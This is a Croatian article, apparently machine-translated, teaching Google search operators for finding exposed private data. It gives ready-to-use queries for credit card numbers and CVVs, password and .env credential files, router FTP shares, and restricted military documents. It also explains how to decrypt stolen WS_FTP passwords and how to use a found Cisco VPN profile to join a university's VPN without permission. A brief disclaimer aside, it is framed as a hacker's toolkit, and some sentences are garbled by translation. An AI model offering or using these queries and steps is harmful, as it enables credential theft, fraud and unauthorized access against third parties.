    Dobivanje privatnih podataka ne znači uvijek hakiranje - ponekad se oni javno objave. Poznavanje Google postavki i malo domišljatosti omogućit će vam da pronađete puno zanimljivih stvari – od brojeva kreditnih kartica do dokumenata FBI-a.

    UPOZORENJE Sve informacije služe samo u informativne svrhe. Ni urednici ni autor nisu odgovorni za bilo kakvu moguću štetu prouzročenu materijalima ovog članka.

    Danas je sve povezano s internetom, s malo brige o ograničavanju pristupa. Stoga mnogi privatni podaci postaju plijen tražilica. Spider roboti više nisu ograničeni na web stranice, već indeksiraju sav sadržaj dostupan na internetu i neprestano dodaju informacije koje nisu javne u svoje baze podataka. Lako je saznati te tajne - samo trebate znati kako ih pitati.

    Tražim datoteke

    U sposobnim rukama Google će brzo pronaći sve što se ne nalazi na internetu, primjerice osobne podatke i datoteke za službenu upotrebu. Često su skriveni poput ključa ispod tepiha: nema stvarnih ograničenja pristupa, podaci jednostavno leže na poleđini stranice, kamo ne vode veze. Standardno Google web sučelje nudi samo osnovne napredne postavke pretraživanja, ali i ove će biti dovoljne.

    Svoju Google pretragu možete ograničiti na određenu vrstu datoteke koristeći dva operatora: filetype i ext. Prvi specificira format koji je tražilica odredila iz naslova datoteke, drugi specificira ekstenziju datoteke, bez obzira na njezin unutarnji sadržaj. Kod pretraživanja u oba slučaja potrebno je samo navesti ekstenziju. U početku je operator ext bio prikladan za korištenje u slučajevima kada datoteka nije imala specifične karakteristike formata (na primjer, za traženje ini i cfg konfiguracijskih datoteka koje mogu sadržavati bilo što). Sada su se Googleovi algoritmi promijenili i nema vidljive razlike između operatera – u većini slučajeva rezultati su isti.


    Filtriranje rezultata

    Prema zadanim postavkama, Google traži riječi i, općenito, sve unesene znakove u svim datotekama na indeksiranim stranicama. Područje pretraživanja možete ograničiti domenom najviše razine, određenim mjestom ili lokacijom niza pretraživanja u samim datotekama. Za prve dvije opcije upotrijebite operator stranice, nakon čega slijedi naziv domene ili odabrane stranice. U trećem slučaju, čitav niz operatora omogućuje vam pretraživanje informacija u servisnim poljima i metapodacima. Na primjer, allinurl će pronaći zadanu u tijelu samih poveznica, allinanchor - u tekstu opremljenom oznakom , allintitle - u naslovima stranica, allintext - u tijelu stranica.

    Za svakog operatora postoji lagana verzija s kraćim nazivom (bez prefiksa all). Razlika je u tome što će allinurl pronaći poveznice sa svim riječima, a inurl samo one prve od njih. Druga i sljedeće riječi iz upita mogu se pojaviti bilo gdje na web stranicama. Operator inurl također se razlikuje od drugog operatora sa sličnim značenjem - site. Prvi vam također omogućuje pronalaženje bilo kojeg niza znakova u poveznici na traženi dokument (na primjer, /cgi-bin/), koji se široko koristi za pronalaženje komponenti s poznatim ranjivostima.

    Probajmo to u praksi. Uzimamo allintext filtar i tražimo da se od zahtjeva proizvede popis brojeva i kodova za provjeru kreditnih kartica koje će prestati vrijediti tek za dvije godine (ili kada se njihovi vlasnici umore hraniti sve).

    Allintext: broj kartice datum isteka /2017 cvv

    Kada u vijestima pročitate da je mladi haker “upao u servere” Pentagona ili NASA-e, ukravši tajne podatke, u većini slučajeva govorimo upravo o takvoj osnovnoj tehnici korištenja Googlea. Pretpostavimo da nas zanima popis zaposlenika NASA-e i njihovi kontakt podaci. Sigurno je da je takav popis dostupan u elektroničkom obliku. Radi praktičnosti ili zbog previda, može se nalaziti i na web stranici same organizacije. Logično je da u ovom slučaju neće biti linkova na njega, budući da je namijenjen za internu upotrebu. Koje riječi mogu biti u takvoj datoteci? Najmanje - polje "adresa". Testiranje svih ovih pretpostavki je jednostavno.


    Inurl:nasa.gov filetype:xlsx "adresa"


    Koristimo se birokracijom

    Ovakva otkrića su lijep detalj. Doista solidan ulov daje detaljnije poznavanje Googleovih operatera za webmastere, same Mreže i posebnosti strukture onoga što se traži. Znajući detalje, možete jednostavno filtrirati rezultate i poboljšati svojstva potrebnih datoteka kako biste u ostatku dobili uistinu vrijedne podatke. Smiješno je da tu u pomoć priskače birokracija. Proizvodi standardne formulacije koje su prikladne za traženje tajnih informacija koje su slučajno procurile na Internet.

    Na primjer, žig izjave o distribuciji, obavezan u uredu američkog ministarstva obrane, znači standardizirana ograničenja distribucije dokumenta. Slovo A označava javna priopćenja u kojima nema ničega tajnog; B - samo za internu upotrebu, C - strogo povjerljivo i tako dalje do F. Posebno se ističe slovo X koje označava posebno vrijedne podatke koji predstavljaju državnu tajnu najviše razine. Neka oni koji bi to trebali raditi na dužnosti traže takve dokumente, a mi ćemo se ograničiti na datoteke sa slovom C. Prema DoDI direktivi 5230.24, ova oznaka se dodjeljuje dokumentima koji sadrže opis kritičnih tehnologija koje potpadaju pod izvoznu kontrolu . Takve pažljivo zaštićene podatke možete pronaći na stranicama u domeni najviše razine.mil, dodijeljenoj američkoj vojsci.

    "IZJAVA O DISTRIBUCIJI C" inurl:navy.mil

    Vrlo je zgodno što domena .mil sadrži samo stranice Ministarstva obrane SAD-a i njegovih ugovornih organizacija. Rezultati pretraživanja s ograničenjem domene su iznimno čisti, a naslovi govore sami za sebe. Traženje ruskih tajni na ovaj način praktički je beskorisno: u domenama.ru i.rf vlada kaos, a nazivi mnogih oružanih sustava zvuče kao botanički (PP "Kiparis", samohodne puške "Akatsia") ili čak bajno ( TOS “Buratino”).


    Pažljivim proučavanjem bilo kojeg dokumenta sa stranice u .mil domeni, možete vidjeti druge oznake kako biste precizirali svoju pretragu. Na primjer, referenca na izvozna ograničenja "Sec 2751", što je također zgodno za traženje zanimljivih tehničkih informacija. S vremena na vrijeme uklanja se sa službenih stranica na kojima se nekada pojavljivao, pa ako ne možete pratiti zanimljivu poveznicu u rezultatima pretraživanja, koristite Googleov cache (cache operator) ili web stranicu Internet Archive.

    Penjanje u oblake

    Uz slučajno deklasificirane vladine dokumente, veze na osobne datoteke iz Dropboxa i drugih servisa za pohranu podataka koji stvaraju "privatne" veze na javno objavljene podatke povremeno iskaču u Googleovoj predmemoriji. Još je gore s alternativnim i domaćim uslugama. Na primjer, sljedeći upit pronalazi podatke za sve korisnike Verizona koji imaju instaliran FTP poslužitelj i aktivno koriste svoj usmjerivač.

    Allinurl:ftp:// verizon.net

    Takvih pametnjakovića sada ima više od četrdeset tisuća, a u proljeće 2015. bilo ih je znatno više. Umjesto Verizon.net možete zamijeniti ime bilo kojeg poznatog pružatelja usluga, a što je on poznatiji, ulov može biti veći. Putem ugrađenog FTP poslužitelja možete vidjeti datoteke na vanjskom uređaju za pohranu spojenom na usmjerivač. Obično je to NAS za daljinski rad, osobni oblak ili neka vrsta peer-to-peer preuzimanja datoteka. Sav sadržaj takvih medija indeksiran je od strane Googlea i drugih tražilica, tako da možete pristupiti datotekama pohranjenim na vanjskim diskovima putem izravne veze.

    Gledajući konfiguracije

    Prije široko rasprostranjene migracije u oblak, jednostavni FTP poslužitelji vladali su kao udaljena pohrana, koja je također imala puno ranjivosti. Mnogi od njih aktualni su i danas. Na primjer, popularni program WS_FTP Professional pohranjuje konfiguracijske podatke, korisničke račune i lozinke u datoteku ws_ftp.ini. Lako ju je pronaći i čitati, budući da su svi zapisi spremljeni u tekstualnom formatu, a lozinke su šifrirane s Triple DES algoritmom nakon minimalnog zamagljivanja. U većini verzija dovoljno je jednostavno odbaciti prvi bajt.

    Lako je dešifrirati takve lozinke pomoću uslužnog programa WS_FTP Password Decryptor ili besplatne web usluge.

    Kada se govori o hakiranju proizvoljne web stranice, obično se misli na dobivanje lozinke iz zapisa i sigurnosnih kopija konfiguracijskih datoteka CMS-a ili aplikacija za e-trgovinu. Ako znate njihovu tipičnu strukturu, lako možete naznačiti ključne riječi. Linije poput onih u ws_ftp.ini vrlo su česte. Na primjer, u Drupalu i PrestaShopu uvijek postoji identifikator korisnika (UID) i odgovarajuća lozinka (pwd), a sve informacije pohranjene su u datotekama s nastavkom .inc. Možete ih potražiti na sljedeći način:

    "pwd=" "UID=" ext:inc

    Otkrivanje DBMS lozinki

    U konfiguracijskim datotekama SQL poslužitelja korisnička imena i adrese e-pošte pohranjeni su u čistom tekstu, a umjesto lozinki ispisani su njihovi MD5 hashovi. Strogo govoreći, nemoguće ih je dešifrirati, ali možete pronaći podudaranje među poznatim parovima hash-lozinka.

    Još uvijek postoje DBMS-ovi koji niti ne koriste hashiranje lozinki. Konfiguracijske datoteke bilo kojeg od njih mogu se jednostavno pregledati u pregledniku.

    Intext:DB_PASSWORD filetype:env

    Pojavom Windows poslužitelja, mjesto konfiguracijskih datoteka djelomično je zauzeo registar. Možete pretraživati ​​njegove grane na potpuno isti način, koristeći reg kao vrstu datoteke. Na primjer, ovako:

    Filetype:reg HKEY_CURRENT_USER "Lozinka"=

    Ne zaboravimo očito

    Ponekad je moguće doći do klasificiranih podataka pomoću podataka koji su slučajno otvoreni i dospjeli su do Googlea. Idealna opcija je pronaći popis lozinki u nekom uobičajenom formatu. Samo očajni ljudi mogu podatke o računu pohraniti u tekstualnu datoteku, Word dokument ili Excel tablicu, no njih uvijek ima dovoljno.

    Filetype:xls inurl:password

    S jedne strane, postoji mnogo načina za sprječavanje takvih incidenata. U htaccessu je potrebno odrediti odgovarajuća prava pristupa, zakrpati CMS, ne koristiti ljevoruke skripte i zatvoriti ostale rupe. Također postoji datoteka s popisom iznimaka robots.txt koja zabranjuje tražilicama indeksiranje datoteka i direktorija navedenih u njoj. S druge strane, ako se struktura robots.txt na nekom poslužitelju razlikuje od standardne, tada odmah postaje jasno što se na njemu želi sakriti.

    Popisu direktorija i datoteka na bilo kojem mjestu prethodi standardni indeks. Budući da se za potrebe usluge mora pojaviti u naslovu, ima smisla ograničiti njegovo pretraživanje na operator naslova. Zanimljive stvari nalaze se u direktorijima /admin/, /personal/, /etc/ pa čak i /secret/.

    Pratite novosti

    Relevantnost je ovdje izuzetno važna: stare ranjivosti se vrlo sporo zatvaraju, ali Google i njegovi rezultati pretraživanja neprestano se mijenjaju. Postoji čak i razlika između filtra "zadnje sekunde" (&tbs=qdr:s na kraju URL-a zahtjeva) i filtra "u stvarnom vremenu" (&tbs=qdr:1).

    Google također implicitno navodi vremenski interval datuma posljednjeg ažuriranja datoteke. Putem grafičkog web sučelja možete odabrati jedno od standardnih razdoblja (sat, dan, tjedan, itd.) ili postaviti datumski raspon, ali ova metoda nije prikladna za automatizaciju.

    Iz izgleda adresne trake možete samo nagađati o načinu ograničavanja izlaza rezultata korištenjem konstrukcije &tbs=qdr:. Slovo y nakon njega postavlja granicu od jedne godine (&tbs=qdr:y), m pokazuje rezultate za prošli mjesec, w - za tjedan, d - za prošli dan, h - za zadnji sat, n - za minutu, i s - za daj mi sekundu. Najnoviji rezultati koji su upravo postali poznati Googleu nalaze se pomoću filtra &tbs=qdr:1.

    Ako trebate napisati pametnu skriptu, bit će korisno znati da je datumski raspon postavljen u Googleu u julijanskom formatu pomoću operatora daterange. Na primjer, tako možete pronaći popis PDF dokumenata s riječju povjerljivo, preuzetih od 1. siječnja do 1. srpnja 2015. godine.

    Povjerljiva vrsta datoteke:pdf raspon datuma:2457024-2457205

    Raspon je naznačen u julijanskom formatu datuma bez uzimanja u obzir razlomka. Njihovo ručno prevođenje iz gregorijanskog kalendara je nezgodno. Lakše je koristiti pretvarač datuma.

    Ponovno ciljanje i filtriranje

    Osim navođenja dodatnih operatora u upitu za pretraživanje, oni se mogu poslati izravno u tijelu veze. Na primjer, specifikacija filetype:pdf odgovara konstrukciji as_filetype=pdf. To olakšava traženje bilo kakvih pojašnjenja. Recimo da je izlaz rezultata samo iz Republike Honduras specificiran dodavanjem konstrukcije cr=countryHN u URL pretraživanja, a samo iz grada Bobruisk - gcs=Bobruisk. Potpuni popis možete pronaći u odjeljku za programere.

    Googleovi alati za automatizaciju osmišljeni su kako bi olakšali život, ali često dodaju probleme. Na primjer, korisnikov grad je određen korisnikovim IP-om putem WHOIS-a. Na temelju tih informacija Google ne samo da uravnotežuje opterećenje između poslužitelja, već i mijenja rezultate pretraživanja. Ovisno o regiji, za isti zahtjev na prvoj stranici će se pojaviti različiti rezultati, a neki od njih mogu biti potpuno skriveni. Dvoslovni kod iza direktive gl=country pomoći će vam da se osjećate kao kozmopolit i tražite informacije iz bilo koje zemlje. Na primjer, šifra Nizozemske je NL, ali Vatikan i Sjeverna Koreja nemaju svoju šifru u Googleu.

    Rezultati pretraživanja često završe pretrpani čak i nakon korištenja nekoliko naprednih filtara. U ovom slučaju zahtjev je lako razjasniti dodavanjem nekoliko izuzetnih riječi (ispred svake od njih stavlja se znak minus). Na primjer, bankarstvo, imena i poduke često se koriste s riječju Osobno. Stoga će čišći rezultati pretraživanja biti prikazani ne udžbeničkim primjerom upita, već pročišćenim:

    Naslov:"Indeks /Osobnih/" -imena -tutorial -bankarstvo

    Zadnji primjer

    Sofisticiranog hakera ističe činjenica da sve što mu treba osigurava sam. Na primjer, VPN je zgodna stvar, ali ili skupa, ili privremena i s ograničenjima. Upisivanje pretplate za sebe je preskupo. Dobro je što postoje pretplate na grupe, a uz pomoć Googlea lako je postati dio grupe. Da biste to učinili, samo pronađite Cisco VPN konfiguracijsku datoteku, koja ima prilično nestandardnu ​​PCF ekstenziju i prepoznatljivu stazu: Program Files\Cisco Systems\VPN Client\Profiles. Jedan zahtjev i pridružit ćete se, primjerice, prijateljskom timu Sveučilišta u Bonnu.

    Filetype:pcf vpn ILI Grupa

    INFO Google pronalazi konfiguracijske datoteke s lozinkama, ali mnoge od njih su napisane u šifriranom obliku ili zamijenjene hashovima. Ako vidite nizove fiksne duljine, odmah potražite uslugu dešifriranja.

    Lozinke su pohranjene šifrirane, ali Maurice Massard već je napisao program za njihovo dešifriranje i besplatno ga daje putem thecampusgeeks.com.

    Google provodi stotine različitih vrsta napada i testova prodora. Postoji mnogo opcija koje utječu na popularne programe, glavne formate baza podataka, brojne ranjivosti PHP-a, oblake itd. Ako točno znate što tražite, znatno ćete lakše pronaći potrebne informacije (osobito one koje niste namjeravali objaviti). Shodan nije jedini koji hrani zanimljive ideje, već svaka baza indeksiranih mrežnih resursa!

    Najbolji članci na temu